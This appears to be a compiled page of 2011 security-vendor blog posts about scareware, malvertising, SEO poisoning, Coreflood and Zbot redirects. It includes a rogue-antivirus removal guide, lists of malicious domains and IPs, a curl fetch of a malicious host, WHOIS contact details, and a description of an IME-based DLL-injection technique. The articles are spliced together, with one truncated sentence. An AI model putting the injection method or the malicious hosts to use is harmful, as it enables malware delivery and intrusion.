Computer Security Articles

Google’s top-trending Anglophone search term right now is, understandably, “osama bin laden dead”.

Google officially describes its hotness (you couldn’t make this stuff up) as volcanic.

The short version, according to the LA Times, is that bin Laden was tracked to a “comfortable mansion surrounded by a high wall in a small town near Islamabad, Pakistan’s capital.”

For bin Laden, it seems, the comfort is no more. “On Sunday, a ‘small team’ of Americans raided the compound. After a firefight, [President Obama], they killed Bin Laden.” Apparently, DNA tests have confirmed Bin Laden’s identity.

And there you have it.

Now you know – so you don’t need to click on any of the links you’re likely to see in email or on social networking sites offering you additional coverage of this newsworthy event.

Many of the links you see will be perfectly legitimate links. But at least some are almost certain to be dodgy links, deliberately distributed to trick you into hostile internet territory.

If in doubt, leave it out!

And even well-meant searches using your favourite search engine might end in tears. What’s commonly called “Black-Hat Search Engine Optimisation” (BH-SEO) means that cybercrooks can often trick the secret search-ranking algorithms of popular search engines by feeding them fake pages to make their rotten content seem legitimate, and to trick you into visiting pages which have your worst interests at heart.

Well-known topics that have been widely written about for years are hard to poison via BH-SEO. The search engines have a good historical sense of which sites are likely to be genuinely relevant if your interest is searches like “Commonwealth of Australia”, “Canadian Pacific Railway” or “Early history of spam”.

But a search term which is incredibly popular but by its very nature brand new – “Japanese tsunami”, “William and Kate engagement”, “Kate Middleton wedding dress” or, of course “Osama bin Laden dead” – doesn’t give the search engines much historical evidence to go on.

Of course, the search engines want to be known for being highly responsive to new trends – that means more advertising revenue for them, after all – and that means, loosely speaking, that they have to take more of a chance on accuracy.

What can you do to keep safe?

* Don’t blindly trust links you see online, whether in emails, on social networking sites, or from searches. If the URL and the subject matter don’t tie up in some obvious way, give it a miss.

* Use an endpoint security product which offers some sort of web filtering so you get early warning of poisoned content. (Sophos Endpoint Security and Control and the Sophos Web Appliance are two examples.

* If you go to a site expecting to see information on a specific topic but get reidrected somewhere unexpected – to a “click here for a free security scan” page, for instance, or to a survey site, or to a “download this codec program to view the video” page – then get out of there at once. Don’t click further. You’re probably being scammed.

Antivirus Center is a rogue anti-spyware program from the same family as Internet Protection. This malware is installed onto your computer through the use of fake scanner pages and Trojans that pretend to be updates to Adobe Flash. When Antivirus Center is installed onto a computer it will be configured to start automatically when Windows starts. Once started it will perform a fake scan of your computer and then state that there are numerous infections present. If you attempt to remove any of these so-called infections with the program it will state that it is unable to do so until you purchase it. As none of the infection files actually exist on your computer, please disregard these scan results and do not purchase the program.

Antivirus Center screen shot
For more screen shots of this infection click on the image above.
There are a total of 7 images you can view.

While Antivirus Center is running it will also display numerous fake security alerts warnings that are designed to make you think that your computer has a severe security problem. The text of these messages are:

Antivirus Center
Your system has come under attack of harmful software. Click here to deactivate it.

Antivirus Center
External software tries to control variety of your system files. This may lead to breaking of some data in your system. Click here to protect remote access to your PC & delete these programs.

Antivirus Center
Spyware.IEMonster process is found. The virus is going to send your passwords from Internet browser (Explorer, Mozilla Firefox, Outlook & others) to the third-parties. Click here for further protection of your data with Antivirus Center.

Antivirus Center Firewall Alert
Suspicious activity in your registry system space was detected. Rogue malware detected in your system. Data leaks and system damage are possible. Please use a deep scan option.

Antivirus Center Firewall Alert
Antivirus Center has prevent a program from accessing the Internet.
“iexplore.exe” is infected with Trojan. This worm has tried to use “iexplore.exe” to connect to remove host and send your credit card information.

Antivirus Center Firewall Alert
Your computer is being attacked from a remote machine!
Block Internet access to your computer to prevent system infection.
Attacker IP: <ip address>
Attack type: RCPT exploit

Antivirus Center
Your computer is under the infections threat. Run instant shield protection to safe your data and prevent internet access to your credit card information. Select this to run instant shield.

Antivirus Center Firewall Alert
Warning
Keylogger activity detected!
Your account in social network is under attack. Click here to block unauthorized modification by removing threats (Recommended)

Just like the scan results, all of these warnings are fake and should be ignored.

As you can see, Antivirus Center was created for one reason; to scare you into thinking your computer is infected so that you will then purchase the program. For no reason should you purchase Antivirus Center, and if you already have, you should contact your credit card company and dispute the charges stating that the program is a computer infection. Finally, to remove this infection, and related malware, please use the removal guide below.

Threat Classification:

• Information on Rogue Programs & Scareware

Advanced information:

View Antivirus Center files.
View Antivirus Center Registry Information.

Tools Needed for this fix:

• Malwarebytes’ Anti-Malware

Symptoms that may be in a HijackThis Log:

O4 – HKCU\..\Run: [<random numbers and characters>] rundll32.exe “C:\Documents and Settings\All Users\Application Data\<random numbers and characters>.dat”, <random characters> 04/29/11 – Initial guide creation.

Guide Updates:

04/29/11 – Initial guide creation.

Automated Removal Instructions for Antivirus Center using Malwarebytes’ Anti-Malware:

1. Print out these instructions as we may need to close every window that is open later in the fix.
   
   
2. Reboot your computer into Safe Mode with Networking. To do this, turn your computer off and then back on and immediately when you see anything on the screen, start tapping the F8 key on your keyboard. Eventually you will be brought to a menu similar to the one below:
   
   
   
   
   Using the arrow keys on your keyboard, select Safe Mode with Networking and press Enter on your keyboard. If you are having trouble entering safe mode, then please use the following tutorial: How to start Windows in Safe Mode
   
   Windows will now boot into safe mode with networking and prompt you to login as a user. Please login as the same user you were previously logged in with in the normal Windows mode. Then proceed with the rest of the steps.
   
   
3. It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.
   
   
4. Before we can do anything we must first end the processes that belong to Antivirus Center so that it does not interfere with the cleaning procedure. To do this, please download RKill to your desktop from the following link.
   
   RKill Download Link – (Download page will open in a new tab or browser window.)
   
   When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.
   
   
5. Once it is downloaded, double-click on the iExplore.exe icon in order to automatically attempt to stop any processes associated with Antivirus Center and other Rogue programs. Please be patient while the program looks for various malware programs and ends them. When it has finished, the black window will automatically close and you can continue with the next step. If you get a message that RKill is an infection, do not be concerned. This message is just a fake warning given by Antivirus Center when it terminates programs that may potentially remove it. If you run into these infections warnings that close RKill, a trick is to leave the warning on the screen and then run RKill again. By not closing the warning, this typically will allow you to bypass the malware trying to protect itself so that RKill can terminate Antivirus Center . So, please try running RKill until the malware is no longer running. You will then be able to proceed with the rest of the guide. Do not reboot your computer after running RKill as the malware programs will start again.
   
   If you continue having problems running RKill, you can download the other renamed versions of RKill from the RKill download page. Both of these files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.
   
   
6. Now you should download Malwarebytes’ Anti-Malware, or MBAM, from the following location and save it to your desktop:
   
   Malwarebytes’ Anti-Malware Download Link (Download page will open in a new window)
   
   
   
7. Once downloaded, close all programs and Windows on your computer, including this one.
   
   
8. Double-click on the icon on your desktop named mbam-setup.exe. This will start the installation of MBAM onto your computer.
   
   
9. When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure you leave both the Update Malwarebytes’ Anti-Malware and Launch Malwarebytes’ Anti-Malware checked. Then click on the Finish button. If MalwareBytes’ prompts you to reboot, please do not do so.
   
   
10. MBAM will now automatically start and you will see a message stating that you should update the program before performing a scan. As MBAM will automatically update itself after the install, you can press the OK button to close that box and you will now be at the main program as shown below.
    
    
    
    
    
11. On the Scanner tab, make sure the the Perform full scan option is selected and then click on the Scan button to start scanning your computer for Antivirus Center related files.
    
    
12. MBAM will now start scanning your computer for malware. This process can take quite a while, so we suggest you go and do something else and periodically check on the status of the scan. When MBAM is scanning it will look like the image below.
    
    
    
    
    
13. When the scan is finished a message box will appear as shown in the image below.
    
    
    
    
    You should click on the OK button to close the message box and continue with the Antivirus Center removal process.
    
    
14. You will now be back at the main Scanner screen. At this point you should click on the Show Results button.
    
    
15. A screen displaying all the malware that the program found will be shown as seen in the image below. Please note that the infections found may be different than what is shown in the image.
    
    
    
    
    
    You should now click on the Remove Selected button to remove all the listed malware. MBAM will now delete all of the files and registry keys and add them to the programs quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.
    
    
16. When MBAM has finished removing the malware, it will open the scan log and display it in Notepad. Review the log as desired, and then close the Notepad window.
    
    
17. You can now exit the MBAM program.
    
    
18. As many rogues and other malware are installed through vulnerabilities found in out-dated and insecure programs, it is strongly suggested that you use Secunia PSI to scan for vulnerable programs on your computer. A tutorial on how to use Secunia PSI to scan for vulnerable programs can be found here:
    
    How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector

Your computer should now be free of the Antivirus Center program. If your current anti-virus solution let this infection through, you may want to consider purchasing the PRO version of Malwarebytes’ Anti-Malware to protect against these types of threats in the future.

If you are still having problems with your computer after completing these instructions, then please follow the steps outlined in the topic linked below:

Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help

Associated Antivirus Center Files:

%AllUsersProfile%\Application Data\<random numbers and characters>.dat
%AllUsersProfile%\Application Data\<random numbers and characters>.ico
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Antivirus Center.lnk
%UserProfile%\Desktop\Antivirus Center.lnk
%Temp%\ins2.tmp
%Temp%\mv3.tmp
%Temp%\wrk4.tmp

File Location Notes:

%UserProfile% refers to the current user’s profile folder. By default, this is C:\Documents and Settings\ for Windows 2000/XP, C:\Users\ for Windows Vista/7, and c:\winnt\profiles\ for Windows NT.

%Temp% refers to the Windows Temp folder. By default, this is C:\Windows\Temp for Windows 95/98/ME, C:\DOCUMENTS AND SETTINGS\ProfileName\LOCAL SETTINGS\Temp for Windows 2000/XP, and C:\Users\ProfileName\AppData\Local\Temp for Windows Vista and Windows 7.

%AllUsersProfile% refers to the All Users Profile folder. By default, this is C:\Documents and Settings\All Users for Windows 2000/XP and C:\ProgramData\ for Windows Vista/7.

Associated Antivirus Center Windows Registry Information:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List “C:\WINDOWS\system32\rundll32.exe” = ‘C:\WINDOWS\system32\rundll32.exe:*:Enabled:Antivirus Center’
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “<random numbers and characters>”

As we all know, compromised sites play an important role in web distributed malware, acting as the conduit, guiding user traffic to further malicious content. Sometimes, the attackers get lucky, and succeed in compromising a high profile, popular site. Another way to increase the number of users exposed to the attack is to compromise advertising content, thereby exposing all users of any 3rd party sites that happen to load the ads.

Late yesterday evening, we started to see evidence of such an attack – Sophos products were blocking certain ad content as Mal/Iframe-U.

Knowing that detection and what it looked for, I was pretty sure that the ad server of Campus Party was compromised.

Sure enough, I could see that in addition to the desired ads (for the July Campus Party event in Valencia), the content also contained malicious JavaScript (highlighted in yellow):

Not the first time I have seen an OpenX ad-server getting compromised, and I suspect it won’t be the last.

Deobfuscating the JavaScript reveals the payload. As our Mal/Iframe-U detection name suggests, it is an iframe to load further malicious content from a remote server.

This initiates the attack, triggering a chain of events summarised below:

• ad content (pro-actively blocked as Mal/Iframe-U) silently loads content from the attack site.
• user’s browser and browser plug-ins are inspected to determine most appropriate exploit content to load. For this a legitimate library is used.
• exploit content (e.g. Mal/HcpExpl-A, Troj/Lifsect-A, Mal/ExpJS-M) is loaded in order to infect the user with malware. At the time of writing, the exploit site is currently serving up a rootkit which Sophos products detect as Mal/TDSSPack-AX.

As is typically the case for today’s web attacks, all of the script components used are heavily obfuscated in an attempt to thwart detection efforts and hinder analysis.

We have already informed those at Campus Party about this issue in order that they can get the malvertising attack cleaned up as soon as possible. In fact as I type, I can see that the ad server is already offline, presumably whilst they resolve the issue. Kudos to them for actioning this quickly!

As to the root cause of the compromise, I do not know exactly how the server was compromised. However, given history, my money would be on an out of date or unpatched version of OpenX.

In the wake of the press reports concerning the recent data breaches at Sony and Epsilon, some organizations are getting the wrong idea about modern online attacks. The media largely chooses to cover mass-scale losses that affect large numbers of consumers from trusted brands.

While it is important to raise awareness about keeping your data safe online and alerting average internet users that they may be victims of data theft, most users are exposed to risk far more frequently and without their knowledge.

In a story published Tuesday on the Bank Information Security blog, Tracy Kitten detailed the exploits of Rogelio Hackett, Jr., who stole more than 675,000 credit cards. The resulting damages exceeded $36 million.

Hackett’s strategy? Find smaller organizations who have not coded their websites properly, allowing access to their data via SQL injection vulnerabilities. Based upon the reports I see from customers and other researchers, there are likely hundreds, if not thousands, of Hacketts out there systematically looking for low-hanging fruit.

Hackett may be sentenced to 12 years in prison for his crimes, but for every attacker who is caught, another one is ready to fill his shoes.

The FBI issued an security hubs.

Real-world events occasionally generate a massive number of online searches. Japan’s recent earthquake and the subsequent tsunami that followed is a good example of a sudden event that turned the world’s attention to Google. And as topics trend in Google’s search results, Search Engine Optimization (SEO) attacks are attempted. Our March 11th post urged caution while searching for information.

The post also noted that Google has been doing a pretty good job of keeping SEO attacks at bay and filtered out of their search results. Web results that is.

Since October of last year, we’ve seen a steady growth in image based SEO attacks. Because Google is winning the (cat and mouse) battle against malicious site SEO, some attackers have shifted to image searches. Image based SEO attacks are more of a technical challenge. Instead of following trends and then connecting to a hosted attack site, the attacker must instead connect a trending topic to a particular image, and then link that image to a compromised site, which then links to the attacker’s site.

It’s a fascinating evolution that our Threat Insights team has been investigating.

But we’ll provide more details about that in a future post.

Today, we want to mention what’s likely to be a heavily searched for image tomorrow, Kate Middleton’s wedding dress.

People aren’t simply going to want to read about the wedding of Prince William and Kate Middleton, they’re going to want to see it. And so tomorrow, we expect Google’s image search to be more popular than ever.

We’re already seeing some “royal wedding coverage” SEO attacks.

Here’s an example which includes some well known footballers in the results:



The image is called “0611-soccer-studs1-credit.jpg” is linked to “lingerie-now-com”.

Google’s preview is loaded in the front, while the host site is loaded in the background.



What happens next is that the background site is linked to the attack site, which takes over the page and displays a warning message, an attempted scareware attack.



You can see the linkages here:



The site then renders an animated “Online Scan”:



All of the results are nonsense of course, this example is from a clean test machine:



Unfortunately, SEO driven scareware attacks are very successful, relatively speaking. Consumers have been scammed out of millions of dollars by this type of attack.

So be wary of this potential threat if you’re among those searching for wedding pictures.



Goggle’s Web search result for “royal wedding” places the couple’s official site at the top of the page.

And here’s another timely example of an image based SEO attack targeting those that searched for US President Barak Obama’s birth certificate, which was released by the White House yesterday, from GFI Labs’ Christopher Boyd.

Recently,we found many malwares using a smarter way to inject the specified dll into system related to IME management. Comparing to the old IME injection tricks, it is much more difficult to be discovered by users or anti-virus companies.

As we known, at the beginning of last year, many Chinese users found they could not use certain language input method any more. This type of virus caused many inconveniences to the users. The first version of IME injection only substituted the IME file specified by the following registry:

HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\E0020804

Key:IME File

Value:*.ime

where E002 is a device identifier and 0804 is a language identifier in this case Simplify Chinese. If you want, you can get more information about this registry in MSDN.

If IME file is replaced by the malware dll, the original language input method can not work properly. This could by-pass many behaviour monitors, but this story didn’t last long, because this way could be easily discovered.

After that, the technology of the IME injection also updated, the next generation of IME injection was much more complicated, it needed three components. The first component was a management program, it dropped other two components:

1.Fake IME file, this fake IME file always export the following two functions:

IMESetPubString

IMEClearPubString

IMESetPubString – is used to load the malware dll specified by the management component.

2. Dll will be loaded, real payload of the malware.

The management component will register the fake IME file as the system default language input method, then it sends the WM_INPUTLANGCHANGEREQUEST message to the specified windows to activate the fake IME file to load the real malware. This type of injection will not replace any users’ normal IME file, and it’s a little bit more difficult to trace it, but it still has its weakness: users can easily find strange IME choice in the language bar and newly added Keyboard Layouts registry entries, and then fake IME file is left in the users’ system. This type of injection was popular during the second half of the last year, but now it nearly disappeared.

Now, we found the IME injection generation III. It’s smarter and difficult to be discovered. This injection does not change any registry or drop any fake IME file. Its mainly based on their study of functions: ImmLoadLayout and ImmGetImeInfoEx exported from imm32.dll.

ImmLoadLayout: This function opens the key: Keyboard Layouts, and gets the IME file name.

Before invoking this function, the malware has already hooked the function ZwQueryValueKey.

The Hook proc is like the following:

If the value query request is from registry key: IME File, it modifies the return value to the malware’s name: 04f30730.tmp, and then unhooks the function of ZwQueryValueKey.

After the above process, the malware posts a message to explorer.exe

Then explorer.exe calls ImmLoadIME, and this function calls Loadlibrary to load the dll returned by the ImmGetImeInfoEx. The following snapshot shows the call stack of the explorer.exe after it received the WM_INPUTLANGCHANGEREQUEST message:

Now the malware achieved its goal, the malicious dll was loaded by the explorer.exe.

Before the dll loading, Microsoft invokes ApphelpCheckIME to check the legality of dll, but it does not check whether this dll exports any IME functions.

Posting a language change message will cause the explorer to load arbitrary dll, even when this dll does not export any IME functions what is really dangerous!

Many functions of the imm32.dll are still un-documented, and this part becomes more and more attractive to malware writers. We don’t think this is an end, but be sure that we pay more attention to new IME injection methods.

Frank Zheng, Stanley Zhu & Hynek Blinka

Two weeks ago, the Federal Bureau of Investigation (FBI) obtained a court order in Connecticut, USA. This court order allowed the FBI to undertake an anti-cybercrime operation of a sort which had never been authorised before in America.

Not only did the cops seize various US-based Command and Control (C&C) servers belonging the Coreflood botnet, but they also redirected all traffic intended for those servers to a surrogate server under their own control.

When infected PCs connected to the surrogate, the cops instructed the bot process to terminate, providing that the PC appeared to be in the US, and thus under their jurisdiction.

What made this court order a first in the US is that it gave law enforcement permission to interfere directly with computers belonging to users who weren’t being investigated, or charged with any crime.

The motivation for this novelty was that the Coreflood bot family is notorious for exfiltrating data from infected PCs. As the FBI’s Temporary Restraining Order puts it, Coreflood sets out:

to commit wire fraud and bank fraud in violation of Title 18, United States Code, Sections 1343 and 1344, and to engage in unauthorised interception of electronic communications in violation of Title 18, United States Code, Section 2511.

But the Electronic Frontier Foundation (EFF), a worldwide privacy advocacy group, expressed concerns about this sort of legally-endorsed interference. In particular, the EFF pointed out that there is something unappealing about sending commands of any sort to unknown malicious code on someone else’s computer without their explicit permission.

This may sound like a petty objection – and perhaps, in the real world, it is – but unless you know exactly which variant of the bot is on each PC, there is always a potential risk with trying to use a bot against itself. What if the crooks have deliberately rewired the “stop” command to carry out a “format hard drive” operation instead?

Nevertheless, the FBI went ahead, and the exercise seems to have been a success. So much so, in fact, that the cops went back to court over the weekend to ask for the two-week court order to be extended for a further month.

The new court application shows that the original two-week intervention had a measurable effect, documenting graphically the decrease in US-based PCs which tried to connect to the FBI’s surrogate C&C server:

The cops also compared the relative drop in Coreflood activity in the US and overseas. Sending “stop” commands to the infected PCs was noticeably more effective that simply cutting those PCs off from the C&C servers:

The big difference in the new court application is that the FBI is now asking to be allowed to uninstall Coreflood from infected PCs, not just to stop the bot process temporarily.

The FBI says it will only attempt this sort of automatic remote disinfection on “infected computers of identifiable victims who have provided written consent to do so.” This should keep the EFF happy, but it won’t be half as effective as blindly going ahead with automatic disinfection, without waiting for an exchange of written agreements.

Of course, even court-sanctioned auto-cleanup wouldn’t solve the real problem. Hundreds of thousands of users in the US (and many more than that overseas) have allowed themselves to get and to remain infected by malware which is comparatively easy to detect, remove and prevent.

As the FBI’s court application wryly notes in conclusion:

While the use of an “uninstall” command to remove Coreflood cannot be considered a replacement for the use of properly configured and updated anti-virus software, removing Coreflood from infected computers will at least serve to eliminate a known threat to that victim’s privacy and financial security.

These infected PCs actually pose a known threat not only to the victims, but also to the internet as a whole, and they advertise their infection by openly calling home to the C&C servers.

So, perhaps the FBI should have applied for permission to go at the problem in a much more gung-ho fashion, without the written permission clause?

What you you think?

Who would have thought it? A free anti-virus program for Apple Macs being named best anti-malware solution ahead of those security products for boring old Windows.

Well, that’s exactly what happened at the SC Magazine Awards Europe 2011, held last week at the London Hilton on Park Lane.

Over 530 of the industry’s top companies saw Sophos Anti-Virus for Mac Home Edition successfully beat rivals including products from McAfee, Kaspersky and Symantec to win the coveted title of Best Anti-Malware Solution, at the glittering awards dinner.

Naked Security’s own Carole Theriault was on hand to receive the award, flanked by Qualys CEO Philippe Courtot and dead-pan comedian Stewart Francis.

Carole was uncharacteristically lost for words when I asked her how she felt, but I think what has surprised all of us is just how open Mac users are becoming to the idea of security their computers with anti-malware software.

Although the number of malware threats targeting Mac OS X is much much less than Windows, that doesn’t mean that they are non-existent. And Sophos’s free anti-virus for Mac home users has opened many eyes to the fact that security doesn’t have to be an unpleasant experience.

Sophos Anti-Virus for Mac Home Edition’s success at the awards wasn’t the end of the night as far as Sophos was concerned. The company was also named Information Security Vendor of the Year.

A tremendous result in such a competitive marketplace. Our thanks go to SC Magazine’s judging panel for recognising the hard work done by everyone at Sophos in the last year, and for our users and readers for supporting us!

And if you’re still dithering about whether you should run an anti-virus on your Mac at home, then do read the reviews… and then download our free Mac anti-virus.

I always find it interesting to know what goes on in cyber criminals’ minds.

Lately I’ve been observing a deluge of websites being hacked and serving drive-by downloads in the form of Java exploits under the name mario.jar.

Below is a screen cap of some of those caught by our HoneyPots:

On the left hand side are sites that have been hacked and on the right hand side is the payload URL.

When our HoneyPots crawl these sites, here is what happens:

I wanted to see for myself how such an attack looks like, so I fired up my browser and put on special glasses

Let’s take a closer look:

We have our browser, Internet Explorer launching a Java applet (don’t mind Notepad, it’s jut me viewing the html source code). Oh, and I also renamed Process Explorer to iexplore.exe so the malware won’t kill it.

In fact in this attack we can see there is more than just one exploit. (Note the HelpCtr.exe buffer overflow).

But it really all begins with the Java applet, mario.jar:

It contains a bunch of classes which work together to deliver the payload (an executable).

The code is written in such a way that the intent is not obvious:

In fact, VirusTotal detections are very low (2/42).

In this particular case, the payload is a ransom Trojan forcing you to dial a number to get a code to unlock your computer:

Let’s get back to the whole Mario thing. The bad guys really should have picked Mario’s nemesis instead: Wario hosing down computers with malware!

Creative Commons image of  Wario courtesy of favelitu.

Jerome Segura

Some sort of .htaccess hack is going on, redirecting users to infernomag.com and then on to a malicious site that looks like it’s downloading a Zbot variant. It only seems to work with Internet Explorer, and only when the page is accessed from a search engine (like Google). infernomag.com is hosted on 85.17.132.194 (Leaseweb) which is the same server as gtracking.org which alters the .htaccess file as described here.

infernomag.com then redirects users to one of at least two Leaseweb-hosted servers at 85.17.19.201 and 85.17.19.203 (possibly others). These servers have a number of domains on them that appear to belong to legitimate domains registered at GoDaddy by (mostly) UK users – it is likely that their domain control panels have been compromised. Examples are:

actually2.weddingphotographersurrey.net
amount9.gwdempseyjr.com
are5.gwdempseyjr.com
background1.photographbcn.com
brought0.gwdempseyjr.com
captain5.photographbcn.com
captain6.gwdempseyjr.com
charge7.photographbcn.com
signal6.photographbcn.com
completely8.gwdempseyjr.com
congress1.airduct-ventcleaning-mn.com
hard9.photographbcn.com
leading1.airduct-ventcleaning-mn.com
party4.gwdempseyjr.com
providence5.gwdempseyjr.com
safe1.gwdempseyjr.com
she1.weddingphotographerkent.net
tax6.weddingphotographersurrey.net
theory7.weddingphotographerkent.net
am1.theimperialsuspects.com
area6.bettyjaneware.com
belief7.theimperialsuspects.com
contact2.theimperialsuspects.com
cultural5.boneki.com
direct2.theimperialsuspects.com
enemy2.theimperialsuspects.com
baby3.trycue.com
liberal6.trycue.com
most0.ladyofvirtuestore.com
professional0.ladyofvirtuestore.com

Two domains on those servers that do not fit the pattern are:
gfaster.net
fortreecom.net

The WHOIS details are probably fake, for infernomag.com and gtracking.org they are:

   Felix Maurer
   sherman66@ymail.com
   Waldowstr. 61
   Gschwend   Gschwend
   74417   DE
   +49 98466101
fortreecom.net uses the same email address but a different name:

    Bernd Austerlit        (sherman66@ymail.com)
    Alt Reinickendorf 94
    Ziemetshausen
    Bayern,86471
    DE
    Tel. +82.84991251
Detection rates are rubbish. AntiVir detects the payload as TR/Dropper.Gen, BitDefender as Gen:Variant.Zbot.34, Ikarus as Trojan.Win32.Pirminay and Sophos as Mal/Ponmocup-A. Other products do not seem to detect anything at all.

Blocking those IPs of 85.17.132.194, 85.17.19.201 and 85.17.19.203 is safer than trying to block the domains. Blocking the whole /24s instead would probably cause very little inconvenience.

It’s been almost one month since we reported about the huge increase of email-borne malware attachments.  The outbreaks have continued on an almost daily basis since then and we have noted a corresponding dramatic increase of over 70% in the number of zombies.

The traffic graph below shows the continued outbreaks (orange line).  As noted previously the levels shown below have not been seen for well over one year.  The outbreaks often reach levels of 20-40% of all email traffic.

Initially the attachments were “UPS package notifications”.  Then the subjects changed focus to “DHL package notifications”.  The zip attachment however, remained “UPS.exe” leading us to conclude that DHL were transporting UPS malware.

And now (the most logical step we suppose..) the subjects have changed to FedEx package notifications.  The attached “document.zip” file still extracts to “UPS.exe”.  The body text is actually an image served from a variety of fast changing domains.  The body of the email includes random text with a 1-point font size and white color.  In this example the text reads “fwa dp ud gn vbg we ayf zv ole” (yes – that’s quite random.)

There’s no such thing as a free lunch – or free Facebook credits.  As proof consider the attack described below which has several stages:

1)      Users get messages with offers of “free Facebook credits”

2)      These trick users into running a malicious JavaScript

3)      The infected user is lead to a website – which probably offers the malware distributor some pay per click revenue

4)      The malicious script sends out more “free Facebook credits” messages and the cycle starts again

The attack starts in several ways but always includes messages from a compromised friend account:

• A message with detailed instructions that require actively running a malicious JavaScript:

• A chat message with the text: “%firstname% just tried this and got 500 Facebook credits works great <bad link>”  (The link provides instructions similar to those above about loading the code into the address bar).
• A message is posted on the compromised user’s wall:  ”Did you guys hear about the Facebook glitch you can get 500 Facebook credits? check it out <bad link> “.

• An event invitation with similar free credit content and a link to the instructions website.

Once a user follows the instructions the JavaScript malware will do the following:

1.  Redirect the user to a “confirm your identity” page.

2.  Users clicking on “Continue” will then be directed to a verification dialog box with link to “Get the New iPhone 4 Right Here”.

3.   The final destination for those clicking on the iPhone 4 link will be the Smiley Central website.

A certain number of the compromised user’s friends will now receive the “500 free credits” messages.  Not all friends will receive the message – in one script sample I analyzed the message was sent to 15 friends.  In other scripts some of the details changed but the message and method basically remained the same.

Commtouch’s Command Antivirus detects the JavaScript as malware: JS/Agent.ON.

Be careful when trusting messages, even from your friends. Safe Browsing!

Yesterday, over 40 Blue Coat Web Filter customers went boat shopping on Craigslist.

How do I know this? Well, there were 42 requests to a malware domain that was being used in Craigslist ads all over the country. Here’s a sample screenshot:

comtominue.com is part of a fake-warez network that normally uses what we call the “fake Facebook foto” attack. Currently, however, it’s experimenting with Craigslist as a vector for its fake-photo malware, and it seems to be effective at drawing visitors/victims, at least based on yesterday’s sample.

The site/traffic/payload characteristics from comtominue.com were sufficient for WebPulse to dynamically flag all of these requests as Suspicious, so BCWF users were safe from the download. (As of today, over 24 hours into the attack, Virustotal is still only showing 5 hits out of 42 AV engines on the download, showing once again the value added by a defense based on different factors.)

Taking a quick run through the logs of one of our datacenters, I see that the same ad appears to be running on Craigslist sites in Boston, Dallas, Spacecoast (I had to look that one up), Tulsa, Richmond, Phoenix, St Louis, Columbia, and more. A little googling turned up even more cities, and also showed that the same ad is appearing on various other classified ad sites.

Let the buyer beware, indeed.

–C.L.

Weekly (kinda daily) malware update. You can track all updates by following our malware_updates category.

*If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

Today we started to see a lot of sites infected with an iframe malware from jquery4html.co.cc (yes, always the .co.cc). What is funny is that when we tried to access this site to identify what was going on, we were greeted with a page from the .co.cc registrar saying that the domain was available:

The domain jquery4html.co.cc is available Continue to registration >>

If you want to build a site at this address, please visit us at www.co.cc

We found that very strange and tried to register the domain to see what was going on (their registration is free), but when we were close to completing the registration they said that the domain was not available anymore… Too bad.

A few hours later, that domain was already loading additional malicious iframes from diagnostic-scanner-xp-protection.com, hilitsors.cz.cc and many other intermediaries:

$ curl http://jquery4html.co.cc
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Frameset//EN” “http://www.w3.org/TR/html4/frameset.dtd”>
<html>
<head>
<title>Security report #7233 / 2011-04-25..

<frameset rows=”*,90″>
<frame src="http://diagnostic-scanner-xp-protection.com/index2.php?06a..
<frame src="http://hilitsors.cz.cc/xp/index.php?tp=3..7405e1″ noresize scrolling..
..

There are many other sites being used as intermediaries (and just by looking at the domain names you can guess that they try to push the infamous Fake AV), including hundreds of .com:

hilitsors.cz.cc
tempviews.cz.cc
viables.cz.cc
antivcastscanwinxp.com
antivirbestbabyscan.com
antivirbestbarsscan.com
antivirbestdietscan.com
antivirbestgamesscan.com
antivirbestscan.com
antivirus-best-blog-scan.com
antivirusbestblogscan.com
antivirusbestdownloadscan.com
antivirus-best-scan.com
antivirusbestsolutionscan.com
antivirusfirstamendmentscan.com
antivirusfirstladyscan.com
antivirusfirstnationsscan.com
antivirusgreatdepressionscan.com
antivirusgreatesthitsscan.com
antivirusgreatlakesscan.com
antivmagazinescanwinxp.com
antivscancomputerswinxp.com
antivscancorporationwinxp.com
antivscandefinitionwinxp.com
antivscandocumentswinxp.com
antivscanengineswinxp.com
antivscanenginewinxp.com
antivscanimageswinxp.com
antivscanspeedwinxp.com
antivscantechnologieswinxp.com
antivscantoolswinxp.com
antivscantoolwinxp.com
anti-v-scan-winxp.com
antivscanwinxp.com
bestbonescanantiv.com
bestcolourscanantiv.com
bestlaserscanantiv.com
bestliverscanantiv.com
bestlungscanantiv.com
bestprogressivescanantiv.com
bestquickscanantiv.com
bestscanadamantiv.com
bonescanantivfree.com
cardscannerprotectionfast.com
cardscannerprotectionfree.com
card-scanner-win-protection.com
cardscannerwinprotection.com
card-scanner-xp-protection.com
cardscannerxpprotection.com
cheapscannerprotectionfast.com
cheapscannerprotectionfree.com
cheapscannerwinprotection.com
cheap-scanner-xp-protection.com
cheapscannerxpprotection.com
codescannerprotectionfast.com
codescannerprotectionfree.com
codescannerwinprotection.com
code-scanner-xp-protection.com
codescannerxpprotection.com
colorscannerprotectionfast.com
colorscannerprotectionfree.com
colorscannerwinprotection.com
color-scanner-xp-protection.com
colorscannerxpprotection.com
colourscanantivfree.com
compactscannerprotectionfast.com
compactscannerprotectionfree.com
compactscannerwinprotection.com
compact-scanner-xp-protection.com
compactscannerxpprotection.com
desktopscannerprotectionfast.com
desktopscannerprotectionfree.com
desktopscannerwinprotection.com
desktop-scanner-xp-protection.com
desktopscannerxpprotection.com
diagnosticscannerprotectionfast.com
diagnosticscannerprotectionfree.com
diagnosticscannerwinprotection.com
